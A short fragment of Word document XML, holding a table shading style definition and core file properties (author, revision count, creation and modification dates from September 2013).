  <w:style w:type="table" w:styleId="MediumShading1-Accent1">
    <w:name w:val="Medium Shading 1 Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="63"/>
    <w:rsid w:val="004D471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9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mdgh</dc:creator>
  <cp:lastModifiedBy>User</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-04T16:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-09-15T14:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>